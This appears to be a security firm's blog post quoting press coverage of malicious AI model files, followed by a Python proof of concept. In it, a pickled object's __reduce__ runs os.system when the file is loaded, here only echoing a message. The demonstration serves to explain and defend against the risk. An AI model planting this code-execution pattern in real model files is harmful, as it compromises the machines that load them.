Dark Reading mentioned us in its coverage of how to spot attacks delivered through AI models:
"Typically, models are saved as Pickle files by Scikit-Learn (.pkl) and PyTorch (.pt), and as the Hierarchical Data Format version 5 (HDF5) files often used by Keras and TensorFlow. Unfortunately, these file formats can contain executable code and often have insecure serialization functions that are prone to vulnerabilities. In both cases, an attacker could attack the machines on which the model is run, says Diana Kelley, chief information security officer at Protect AI, an AI application security firm.
"Because of the way that models work, they tend to run with very high privilege within an organization, so they have a lot of access to things because they have to touch or get input from data sources," she says. "So if you can put something malicious into a model, then that would be a very viable attack."
Hugging Face, for example, now boasts more than 540,000 models, up from less than 100,000 at the end of 2022. Protect AI scanned Hugging Face and found 3,354 unsafe models — about 1,350 that were missed by Hugging Face's own scanner, the company stated in January."
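The pickle risk the article describes is straightforward to demonstrate. The sketch below is purely illustrative and is not taken from Protect AI's research: the MaliciousPayload class, the echo command, and the model.pkl filename are all invented for this example. It shows why a tampered .pkl or .pt "model" can compromise the machine that loads it: unpickling lets the file's author run arbitrary code via __reduce__.

```python
import pickle
import os

# Illustrative only: unpickling executes code chosen by whoever wrote the file.
class MaliciousPayload:
    def __reduce__(self):
        # On unpickling, pickle is instructed to call os.system(...).
        # A real attacker would run something far more harmful than echo.
        return (os.system, ("echo 'arbitrary code ran during model load'",))

# "Saving" a model file that carries the payload.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# A victim who loads the untrusted file executes the attacker's code
# before any model weights are even inspected.
with open("model.pkl", "rb") as f:
    pickle.load(f)  # runs os.system(...) as a side effect
```

Safer loading paths, such as the safetensors format or PyTorch's torch.load(..., weights_only=True) option, avoid executing arbitrary pickle code, though scanning third-party models before use remains prudent.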